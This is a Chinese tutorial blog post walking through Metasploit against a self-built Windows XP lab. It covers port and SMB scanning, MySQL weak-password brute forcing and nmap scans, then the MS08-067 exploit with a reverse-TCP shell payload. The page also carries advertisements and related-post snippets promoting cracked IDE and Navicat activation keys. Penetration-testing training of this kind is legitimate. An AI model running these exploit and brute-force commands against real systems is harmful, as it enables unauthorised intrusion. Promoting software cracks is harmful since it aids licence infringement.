1. 全栈程序员必看首页

msfconsole攻击工具_服务器console接口是干嘛的

全栈程序员-站长 未分类 阅读 4

msfconsole攻击工具_服务器console接口是干嘛的?Msfconsole工具概括:???Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.(1)进行端口扫描.(2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用WinXP,然后对服务器进行渗透测试.

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

?生活总会难过?,?但好运也会如期而至?

????????????????????????

       

?目录

                  ?Msfconsole工具 概括:

         ?免责声明:

         ?测试机:

         ?靶场:    

                  ?Msfconsole的使用:

        ?打开Msfconsole工具:

        ?第一步:进行端口扫描.

        ?第二步:进行服务的扫描.

        ?第三步:扫描3306(Mysql)端口的弱口令

        ?第四步:在msf模块里也可以使用nmap进行扫描.

        ?第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

         ?渗透测试失败的原因:

?Msfconsole工具 概括:

???Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.

      

?免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

     

?测试机:

kali2021    链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg 
                  提取码:tian

    

?靶场:    

本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win XP(IP地址:192.168.1.103)

Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客

    

?Msfconsole的使用:

?打开Msfconsole工具:

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

     

?第一步:进行端口扫描.

?(1)查看端口扫描的模块:

search portscan

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用端口扫描模块:

use auxiliary/scanner/portscan/tcp

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为100:

set threads 100

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run 或者 exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

       

?第二步:进行服务的扫描.

?(1)查看smb_version服务模块:

search smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用服务模块:

use auxiliary/scanner/smb/smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为10:

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

        

?第三步:扫描3306(Mysql)端口的弱口令

?(1)查看扫描3306(Mysql)端口的弱口令模板信息:

search mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?(2)使用扫描3306(Mysql)端口的弱口令模块:

use auxiliary/scanner/mysql/mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?(3)查看模块信息(模块里的yes都要填):

show options

msfconsole攻击工具_服务器console接口是干嘛的

?(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

?(5)设置线程为10:

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?(6)使用(执行):run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?(7)退出到msf :

back

msfconsole攻击工具_服务器console接口是干嘛的

          

?第四步:在msf模块里也可以使用nmap进行扫描.

?(1)主机发现:

nmap -sn 地址/24

msfconsole攻击工具_服务器console接口是干嘛的

?(2)端口扫描:

nmap -sS 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(3)系统扫描:

nmap -O 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(4)版本扫描:

nmap -sV 地址

msfconsole攻击工具_服务器console接口是干嘛的

?(5)综合扫描:

nmap -A 地址

msfconsole攻击工具_服务器console接口是干嘛的

     

?第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

?(1)启动 postgresql 数据库:

systemctl start postgresql.service

msfconsole攻击工具_服务器console接口是干嘛的

     

?(2)设置为开机自启:

systemctl enable postgresql

msfconsole攻击工具_服务器console接口是干嘛的

     

?(3)启动 Metasploit

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

    

?(4)搜索Win XP漏洞对应的模块.

search ms08_067

msfconsole攻击工具_服务器console接口是干嘛的

     

?(5)使用Win XP漏洞扫描模块.

use exploit/windows/smb/ms08_067_netapi

msfconsole攻击工具_服务器console接口是干嘛的

     

?(6)设置攻击载荷

set payload generic/shell_reverse_tcp

msfconsole攻击工具_服务器console接口是干嘛的

     

?(7)查看模块信息(模块里的yes都要填).

show options

msfconsole攻击工具_服务器console接口是干嘛的

     

?(8)查看渗透攻击模块的攻击平台,找到操作系统平台版本

show targets

msfconsole攻击工具_服务器console接口是干嘛的

     

?(9)设置操作系统(target).

set target 34

msfconsole攻击工具_服务器console接口是干嘛的

      

?(10)设置目标IP.

set rhosts (目标IP地址)

msfconsole攻击工具_服务器console接口是干嘛的

    

?(11)设置本地IP

set LHOST 本地IP

msfconsole攻击工具_服务器console接口是干嘛的

     

?(12)设置端口:

set LPORT 4444

msfconsole攻击工具_服务器console接口是干嘛的

     

?(13)使用(执行):run或者exploit

msfconsole攻击工具_服务器console接口是干嘛的

     

?(14)渗透测试成功. 

   

    

?渗透测试失败的原因:

?(1)靶机开启了防火墙.

?(2)两台主机不能互联.(用 ping IP地址)

     

   

   

参考链接:使用MSF 利用 ms08_067 对 XP 进行渗透_丰梓林的博客-CSDN博客

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/196341.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 如何配置adb环境变量(环境变量在哪打开)

    如何配置adb环境变量(环境变量在哪打开)

    配置ADB环境变量1.1:打开控制面板>系统和安全>系统>高级系统设置1.2:在系统变量中新建ANDROID_HMOE变量,赋值路径(D:\install\androidSDK)1.3.在系统变量path中添加%ANDROID_HOME%\platform-tools1.4.cmd进入终端验证adb配置是否成功如下图显示为失败如下图显示为成功2.ADB常用指令2.1.查看设备adbdevices这个命令是查看当前连接的设备,连接到计算机的andro

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月11日
    33
  • git 更新代码到本地

    git 更新代码到本地

    git 更新代码到本地正规流程gitstatus(查看本地分支文件信息,确保更新时不产生冲突)gitcheckout–[filename](若文件有修改,可以还原到最初状态;若文件需要更新到服务器上,应该先merge到服务器,再更新到本地)gitbranch(查看当前分支情况)gitcheckoutremotebranch(若分支为本地分支,则需切换到服务器的远程分支)git…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月15日
    102
  • Navicat15激活码一直生成不了(注册激活) idea

    Navicat15激活码一直生成不了(注册激活)

    (Navicat15激活码一直生成不了)好多小伙伴总是说激活码老是失效,太麻烦,关注/收藏全栈君太难教程,2021永久激活的方法等着你。IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.htmlHQE565NV3W-eyJsaWNlbnNlSWQi…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月28日
    396
  • js中的ajax和jquery中的ajax学习笔记

    js中的ajax和jquery中的ajax学习笔记

    js中的ajax和jquery中的ajax学习笔记

    全栈程序员-站长的头像 全栈程序员-站长
    2021年7月10日
    91
  • Laravel获取所有的数据库表及结构

    Laravel获取所有的数据库表及结构

    Laravel获取所有的数据库表及结构

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月24日
    41
  • 动态规划:最长回文子串 & 最长回文子序列

    动态规划:最长回文子串 & 最长回文子序列

    动态规划:最长回文子串 & 最长回文子序列一、题目所谓回文字符串,就是一个字符串,从左到右读和从右到左读是完全一样的,比如“a”、“aba”、“abba”。对于一个字符串,其子串是指连续的一段子字符串,而子序列是可以非连续的一段子字符串。最长回文子串和最长回文子序列(LongestPalindromicSubsequence)是指任意一个字符串,它说包含的长度最长的回文子串和回文子序列。例如:字符串“ABCDDCEFA…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月29日
    45

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号